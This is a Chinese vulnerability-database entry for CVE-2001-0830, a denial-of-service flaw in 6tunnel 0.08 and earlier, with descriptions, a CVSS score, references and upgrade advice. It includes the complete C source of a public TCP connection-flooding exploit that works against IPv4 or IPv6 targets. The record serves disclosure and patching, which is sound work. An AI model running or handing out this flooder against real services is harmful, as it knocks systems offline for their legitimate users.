CVE-2001-0830
CVSS5.0
发布时间 :2001-12-06 00:00:00
修订时间 :2016-10-17 22:12:05
NMCOE    

[原文]6tunnel 0.08 and earlier does not properly close sockets that were initiated by a client, which allows remote attackers to cause a denial of service (resource exhaustion) by repeatedly connecting to and disconnecting from the server.


[CNNVD]6Tunnel 连接关闭状态拒绝服务漏洞(CNNVD-200112-052)

        CVE(CAN) ID: CVE-2001-0830
        
        
        
        6Tunnel 是一个免费,开放源代码的软件包,用来为那些不提供IPv6的主机提供一个
        
        IPv6隧道。该软件包被发现存在一个安全问题,远程攻击者可能导致合法用户无法使用
        
        该服务。
        
        
        
        这是由于该软件包对套接口的管理方式造成的。当一个客户段从6Tunnel服务器断开
        
        时,该客户端以前使用的套接口进入"Close"状态,但并不会超时,因此一旦大量连
        
        接请求被发向6Tunnel服务器,将导致该服务崩溃。
        
        
        
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0830
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0830
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200112-052
(官方数据源) CNNVD

- 其它链接及资源

ftp://213.146.38.146/pub/wojtekka/6tunnel-0.09.tar.gz
(UNKNOWN)  CONFIRM  ftp://213.146.38.146/pub/wojtekka/6tunnel-0.09.tar.gz
http://marc.info/?l=bugtraq&m=100386451702966&w=2
(UNKNOWN)  BUGTRAQ  20011023 Remote DoS in 6tunnel
http://www.securityfocus.com/bid/3467
(UNKNOWN)  BID  3467
http://xforce.iss.net/static/7337.php
(UNKNOWN)  XF  6tunnel-open-socket-dos(7337)

- 漏洞信息

6Tunnel 连接关闭状态拒绝服务漏洞
中危 设计错误
2001-12-06 00:00:00 2005-11-29 00:00:00
远程  
        CVE(CAN) ID: CVE-2001-0830
        
        
        
        6Tunnel 是一个免费,开放源代码的软件包,用来为那些不提供IPv6的主机提供一个
        
        IPv6隧道。该软件包被发现存在一个安全问题,远程攻击者可能导致合法用户无法使用
        
        该服务。
        
        
        
        这是由于该软件包对套接口的管理方式造成的。当一个客户段从6Tunnel服务器断开
        
        时,该客户端以前使用的套接口进入"Close"状态,但并不会超时,因此一旦大量连
        
        接请求被发向6Tunnel服务器,将导致该服务崩溃。
        
        
        
        

- 公告与补丁

        
        
        临时解决方法:
        
        
        
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        
        
        
        * 我们建议在您的防火墙上限制外部用户对该服务端口的连接请求
        
        
        
        厂商补丁:
        
        
        
        6Tunnel 0.09经修复了这个问题。
        
        
        
        补丁下载地址:
        
        ftp://213.146.38.146/pub/wojtekka/6tunnel-0.09.tar.gz
        

- 漏洞信息 (21126)

6Tunnel 0.6/0.7/0.8 Connection Close State Denial of Service Vulnerability (EDBID:21126)
multiple dos
2001-10-23 Verified
0 awayzzz
N/A [点击下载]
source: http://www.securityfocus.com/bid/3467/info

6tunnel is a freely available, open source software package designed to provide IPv6 functionality to hosts that do not comply with the standard. It works by creating IPv6 tunnels.

A problem has been discovered in the software package that could allow remote users to deny service to legitimate users of the service. The problem is due to the management of sockets by the software package. When a client disconnects from the 6tunnel server, the socket previously used by the client enters the CLOSE state and does not time out. Once a large number of sockets is reached, the service crashes.

This makes it possible for a malicious user to deny service to legitimate users of the service. 

/* 
 * ipv4/ipv6 tcp connection flooder.
 * Originally used as a DoS for 6tunnel (versions < 0.08).
 * Version 0.08 is a broken version. Please update to 0.09.
 *
 * Description of options:
 * -6	:	flood an ipv6 address.
 * port :	tcp port to flood (default: 667)
 * delay:	delay between connections (ms).
 * times:	max number of connections (default: 2500).
 *
 * awayzzz <awayzzz@digibel.org>
 * You can even find me @IRCnet if you need.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define DEFP	667		// default port.
#define DEFT	2500		// default number of connections.
#define TIME	100000	// delay between connections.
                        	// tune it for best performances!

#define HAVE_IPV6

#define VALID_PORT(i)   (i<65535 && i > 0)

int main(int argc,char *argv[])
{

   int ret, fd, i, ip6 = 0;
   int times = DEFT, port = DEFP, delay = TIME;
   struct sockaddr_in sin;
  
#ifdef HAVE_IPV6
   struct sockaddr_in6 sin6;
#endif

   if( argc < 2 ) 
   {
       char *pname;

       if(!(pname = strrchr(argv[0],'/')))
          pname = argv[0];
       else
          pname++;

       printf("Usage: %s [-6] ip4/6 [port] [delay (ms)] [times]\n", pname);
       exit (0);
   }

   if(!strcmp(argv[1],"-6"))
   {

#ifdef HAVE_IPV6
      ip6 = 1;
#endif
      argv++;
      argc--;
   }

   if(argc > 2)
   {
      port = strtol(argv[2], NULL, 10);
      if(!VALID_PORT(port))
      {
         fprintf(stderr,"Invalid port number. Using default\n");
         port = DEFP;
      }
   }

   if(argc > 3)
      delay = strtol(argv[3], NULL, 10);

   if(argc > 4)
      times = strtol(argv[4], NULL, 10);

   printf("Started with %s flood to %s on %d for %d times!\n",
         (ip6 == 1) ? "ipv6" : "ipv4", argv[1], port, times);
    
   for (i = 0; i < times; i++) 
   {
     
#ifdef HAVE_IPV6
      if(ip6)
      {
         fd = socket(AF_INET6, SOCK_STREAM, 0);
         memset(&sin6, 0, sizeof(sin6));

         sin6.sin6_family = AF_INET6;
         sin6.sin6_port = htons(port);
         inet_pton(AF_INET6,argv[1],sin6.sin6_addr.s6_addr);
      }
      else
      {
#endif /* HAVE_IPV6 */

         fd = socket(AF_INET, SOCK_STREAM, 0);
         memset(&sin, 0, sizeof(sin));

         sin.sin_family = AF_INET;
         sin.sin_addr.s_addr = inet_addr(argv[1]);
         sin.sin_port = htons(port);

#ifdef HAVE_IPV6
      }
      if(ip6)
         ret = connect(fd, (struct sockaddr *)&sin6, sizeof(sin6));
      else
#endif 
         ret = connect(fd, (struct sockaddr *)&sin, sizeof(sin));

      if(ret < 0)
      {
         printf("connect %d failed.\n",i);
         perror("connect");
         break;
      }
      
      printf("Connection no. %d\n",i);
      close(fd);
      usleep(delay);
   }
}
/* :wq */		

- 漏洞信息

1977
6Tunnel Connection Close State Remote DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

6Tunnnel contains a flaw that may allow a remote denial of service. The issue is triggered when repeatedly connecting and disconnecting from the to the server occurs, and will result in loss of availability for the service.

- 时间线

2001-10-23 Unknow
2001-10-23 Unknow

- 解决方案

Upgrade to version 0.09 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站